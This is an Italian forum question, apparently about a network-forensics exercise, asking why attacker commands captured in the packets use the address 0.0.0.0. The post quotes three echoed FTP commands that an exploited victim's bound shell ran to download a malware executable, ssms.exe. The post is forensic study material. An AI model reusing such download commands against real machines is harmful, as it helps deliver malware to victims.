Lavorando attraverso questo esercizio in rete forense, l'attaccante ha utilizzato un exploit buffer overflow per inviare comandi al prompt dei comandi della vittima. I comandi aprono una sessione FTP e scaricano malware. Sono confuso sul motivo per cui funziona con l'indirizzo IP 0.0.0.0 I pacchetti mostrano che l'attaccante lega una shell sull'host della vittima e usa FTP per forzare il download di un file eseguibile.
I comandi sono:
echo open 0.0.0.0 8884
echo user 1 1
echo get ssms.exe
La mia domanda è, come potrebbero arrivare ovunque usando l'indirizzo IP 0.0.0.0 ?? La shell legata è in qualche modo associata a / "nella" rete dell'attaccante mentre l'exploit sta succedendo in modo che 0.0.0.0 si risolva in localhost sulla macchina dell'attaccante?
Alcune delle risposte utilizzavano la presenza di questo indirizzo IP per dimostrare che la vittima era un honeypot perché accettava qualsiasi indirizzo IP che l'attaccante ha dato loro e scaricato l'exe come detto. Ancora, come sarebbe 0.0.0.0 arrivare da qualche parte? Inoltre, questo non sarebbe un buon modo per un utente malintenzionato di sapere che ha violato un honeypot?
Una risposta (PDF) fornisce una buona descrizione dell'exploit ma non affronta specificamente questa domanda. Un'altra risposta (PDF) pensa il 0.0.0.0 potrebbe essere un errore, quindi sono confuso.